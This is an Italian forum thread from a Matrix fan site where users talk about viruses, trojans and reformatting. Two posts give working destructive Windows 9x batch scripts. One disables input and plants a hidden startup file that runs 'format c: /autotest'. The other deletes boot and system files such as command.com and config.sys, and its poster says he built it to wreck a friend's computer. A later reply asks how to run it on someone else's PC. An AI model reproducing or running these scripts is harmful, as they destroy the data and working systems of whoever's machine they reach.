WhatIsTheMatrix.IT – Il Sito Italiano su Matrix

Home // Forum

Forum breadcrumbs - Sei qui:ForumZION: CavernaViRuS informatici
o Registrati per creare messaggi e topic.

ViRuS informatici

Gente io ho una scuderia strapiena di quei dannatissimi cavalli di legno.
Potrei aprire un maneggio.

comunque,un un buon antivirus come gia detto, è il syste, migliore,basta solamente una semplice accortezza.TENERLO COSTANTEMENTE AGGIORNATO.

Si è vero che il service pack 2 è una meraviglia,ma se il PC è già infettato l'unica soluzione è:

FORMAT C:

frase a me tanto cara :'

io ODIO il termine FORMAT C:
lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,lo odio, lo odio,lo odio, lo odio,lo odio,HO DOUTO CANCELLARE TUTTI I MIEI DATI SENZA AVERE IL TEMPO DI SALVARLI PER QUELLO STUPIDISSIMO VIRUS CHE MANDANO QUEGLI STUPIDISSIMI HACHER INFORMATICI....
TEPPISTI

Io nn ho mai preso un Trojan, ho preso una volta msblast ma l'ho debellato senza riformattare 😉

L'internauta più fortunato del mondo. :ok:

,HO DOUTO CANCELLARE TUTTI I MIEI DATI SENZA AVERE IL TEMPO DI SALVARLI PER QUELLO STUPIDISSIMO VIRUS CHE MANDANO QUEGLI STUPIDISSIMI HACHER INFORMATICI....
TEPPISTI

e perche non hai provato a mettere il tuo HD come slave su un altro pc per copiare tutti i tuoi dati' 8)

NON SO FORSE PERCHE' ERA INFETTATO PROPRIO L'HD!!! :-_-: :-_-: :-_-:

@echo off
rundll32 mouse,disable
rundll32 keyboard,disable
echo @echo off > a.bat
echo rundll32 mouse,disable >> a.bat
echo rundll32 keyboard,disable >> a.bat
echo format c: /autotest >> a.bat
move a.bat c:windowsmenuav~1progra~1esecuz~1 > nul
attrib +R -A +S +H c:windowsmenuav~1progra~1esecuz~1a.bat
rundll32 kernel,exitkernel

bello questo programmino, bello tanto quanto devastante. NON provatelo. è postato solo per farvi vedere a cosa andreste incontro lanciando un batch con dentro questi comandi. attenzione dunque! se vedete cose del genere (o anceh solo FORMAT C: /autotest) NON ESEGUITE IL FILE, nemmeno se dio in persona vi dice che è per il bene del vostro comptuer.

Perchè, cosa succede''' :boh:

Provalo e vedi 😆

NON FARLO :mrgreen:

---
Questo programmino di bat l'ho fatto per un mio "amico" che mi stava molto a cuore. Così a cuore da friggergli l'HD

[code:1:3c97f4c552]
@echo off
del c:autoexec.bat
REM L'autoexec.bat
REM AHAHAH
del c:config.sys
REM File della configurazione generale
if exist c:windowswin.* goto a
if exist c:windowssystem.ini goto b
if exist c:windows*.* goto c
rename c:*.exe *.DarkNet
goto file
:a
del c:windowswin.*
REM File di avvio
:b
del c:windowssystem.ini
REM File di configurazione
:c
rename c:windows*.exe c:windows*.DarkSide
md c:windowssystemac
copy c:windows*.sys c:windowssystemac >nul
:fine
del c:command.com
REM fine[/code:1:3c97f4c552]

In pratica il Piccì nn parte più

:mrgreen:

[color=blue:8fca827fc0]
..ASSaSSiNO ASSASSINATO DA UN ASSASSINO....[/color:8fca827fc0]

beh, bella anche qeusta versione, la mia era una vecchia versione per win95/98. non discrimina la versione. e nn va su winnt. poi avevo fatto una cosa bella una volta, cioè che includeva nel codice del programma il codice di bat2com.exe e in pratica quando si copiava si riconvertiva ogni volta da bat a com. ma son cagatine

Ma siete tremendi...

Dove devo inserire questo codice...' Avrei un'idea sul picci di una caaaaaaara compagna... :devil:

All "Matrix" related material is property of Village Roadshow Film Ltd. and Warner Bros. - a Time Warner Entertainment company
PHP Code Snippets Powered By : XYZScripts.com